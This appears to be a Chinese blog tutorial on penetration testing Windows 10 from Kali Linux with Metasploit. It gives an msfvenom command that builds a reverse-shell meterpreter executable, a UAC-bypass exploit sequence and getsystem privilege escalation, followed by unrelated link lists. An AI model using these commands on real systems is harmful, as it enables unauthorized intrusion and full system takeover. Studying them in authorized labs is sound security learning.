在进行入侵检测之前，配置好网络环境，使其相互连通，才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell，要想拿到系统级别的shell，添加系统用户，获取用户登录口令，还需要进一步提权。

一、metasploit对windows10入侵测试

攻击机：Kali Linux 2020 IP：192.168.xxx.xxx

靶机：Windows10 IP：192.168.xxx.xxx

1.生成exe文件，在目标主机打开

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=1000 -f exe -o met.exe

2.设置payload，设置本地IP和监听端口

3.运行入侵测试，并获得基础的shell

二、输入background隐藏此界面，然后进一步提权

msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session，可以进行提权操作了，提权过程中并不需要设置端口号了，默认4444即可

 1.输入命令gesystem提取，第一次getuid，显示普通用户权限，第二次是系统权限

 2.获得shell之后，敲入dir命令乱码显示，只要输入chcp 65001，解决了问题

Kali Linux渗透测试——入侵Windows10相关推荐

1. 基于Android设备的Kali Linux渗透测试教程第1章渗透测试

   基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...

2. 《Kali Linux渗透测试的艺术》—第2章2.3节安全测试方法论

   本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的第2章2.3节安全测试方法论,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shake ...

3. 视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试

   Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥899.00 立即订 ...

4. Kali Linux渗透测试——MSF基础篇

   笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 Metasploit是目前最流行.最强大.最具扩展性的渗透测试平台,一定程度上统一了渗透测试和漏洞研究的工作环境,使得新的攻击代码比 ...

5. 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试

   Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...

6. kali linux 渗透测试学习笔记——被动信息收集

   kali linux 渗透测试学习笔记--linux 被动信息收集 被动信息收集 被动信息收集 公开渠道可获得的信息 已公开的信息,通过互联网等渠道去获得 与目标系统不产生直接交互 不对目标访问,扫描 ...

7. Kali Linux渗透测试——信息收集

   笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 渗透测试标准(PTES:http://www.pentest-standard.org)的七个阶段: 1.前期交互阶段:讨论确定渗透 ...

8. 《Kali Linux渗透测试的艺术》—8章8.7节本章总结

   本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的8章8.7节本章总结,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shakeel A ...

9. Kali Linux渗透测试 073 扫描工具-Vega

   本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 vega 简介 使用基本流程 扫描的基本使用 使用截 ...

最新文章

1. [转载]Surging 分布式微服务框架使用入门
2. Effective STL 为包含指针的关联容器指定比较类型
3. Linux 空格转换行
4. Be a new gentleman
5. newman api
6. 元素class属性中的空格
7. 【学术相关】一个博士生接受怎样的训练是完整、全面的科研训练？
8. 16F877A和24C02通信汇编语言,pic单片机IIC通信读24C02程序例 16F877A 主频4M
9. CompletableFuture 异步编程
10. MySQL--timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性
11. 大数据对人们的好处_大数据有什么作用和优势
12. Django 模板中使用 Ajax POST
13. jarsigner 命令对 apk 加密
14. 桌面存放linux文件无法删除,电脑桌面文件无法删除怎么办？
15. 怎么用计算机sinB=0.67,三角函数练习题(附详细解答过程)
16. 36个excel技巧、50个快捷键
17. matlab怎么求周期积分,Matlab中怎么求解积分
18. Android之Keystore文件签名（获取查看apk签名）
19. android进程通信6,[Android]你不知道的Android进程化(6)--进程通信Andromeda框架
20. flutter doctor --android-licenses后Android sdkmanager not found.

热门文章

1. 两步轻松搞定 编辑器上传图片尺寸过大 超出前台显示区域问题！
2. 弘辽科技：千人千面你理解清楚了吗？
3. 为了疫情防控，发短信可查自己的行踪轨迹，是什么技术在帮忙？
4. struts2 lebel标签失效问题
5. java获取指定日期所在的周一至周日的日期号数
6. Doodle era
7. 古希腊悲剧《美狄亚》(2)
8. 一种简单的抗锯齿算法
9. 孩子做作业用计算机,小学五年级写作业让用计算机吗
10. YK01 仪器控制的三个核心